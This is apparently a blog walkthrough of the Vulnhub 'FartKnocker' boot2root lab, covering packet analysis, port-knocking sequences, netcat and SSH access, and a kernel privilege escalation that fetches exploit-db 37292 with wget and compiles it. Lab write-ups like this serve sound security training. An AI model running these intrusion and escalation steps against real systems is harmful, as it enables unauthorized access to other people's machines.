FartKnocker – Vulnhub CTF Challenge Walkthrough

Fart Knocker is a Boot2Root Challenge from TopHatSec Series and is available at Vulnhub. This is a unique and interesting challenge that includes Packet Analysis and Port Knocking.

In this walkthrough, I’ll be using Parrot Security OS but you can use any Linux distro you want.

Start the Virtual machine and use Netdiscover to find its IP Address. Register this IP to your local DNS file “/etc/hosts”.

sudo netdiscover -r [IP/subnet]
sudo nano /etc/hosts


Run a full port Nmap scan.


There’s no port open except HTTP. Open this on your browser.

Click on the link below, you’ll be prompted to download a file.


This is a “pcap” file. when you open this file in Wireshark, you’ll see a knocking pattern on port no 7000, 8000, 9000, 7000, 8000. Apply TCP filter to see the pattern.


Now, I’ll use a utility “knock” to knock these ports install Knockd

sudo apt install knockd
knock knock.local 7000 8000 9000 7000 8000
nmap -p- knock.local


By running Nmap scan, you can see a new port is open. By running Nmap, this port might become closed, knock again and use Netcat to connect to this port.

knock knock.local 7000 8000 9000 7000 8000
nc -v knock.local 8888


This port has revealed a new directory on the Web Server, which contains another PCAP file.


Again, open this file in Wireshark and follow TCP stream on port 8080.


Use Google Translate to translate this message.


So the next knocking sequence is 1, 3, 3, 7. Knock and run Nmap.

knock knock.local 1 3 3 7
nmap -p- knock.local


A new port opened, use Netcat to connect to it.


Open the new directory revealed by this port.


There is a base64 encoded message. Decode it by

echo T3BlbiB1cCBTU0g6IDg4ODggOTk5OSA3Nzc3IDY2NjYK | base64 -d


Knock again and then run Nmap.


An SSH port is open, try to connect to it.


Connect to the SSH again using given credentials.


The shell opened for a few seconds and then closed. Try including the shell manually

ssh butthead@knock.local '/bin/bash'


We got a lower shell, now we need to get root. Run “uname -a” to check Kernel’s version.


Check exploit DB for any related exploits.


We found an exploit. Now, download this exploit using “wget”.

wget https://www.exploit-db.com/download/37292


Now compile this exploit using “gcc” and run it.

mv 37292 priv.c
gcc priv.c -o priv -pthread

And here’s the ROOT Flag!!

Want to learn more about ethical hacking?

We have a  networking hacking course that is of a similar level to OSCP, get an exclusive 95% discount HERE

Related posts

Recent Joomla Update Brings Multiple Security Fixes

Zoom Patched Multiple Security Vulnerabilities With Latest Update

Microsoft Patch Tuesday For February Addressed Two Zero-Days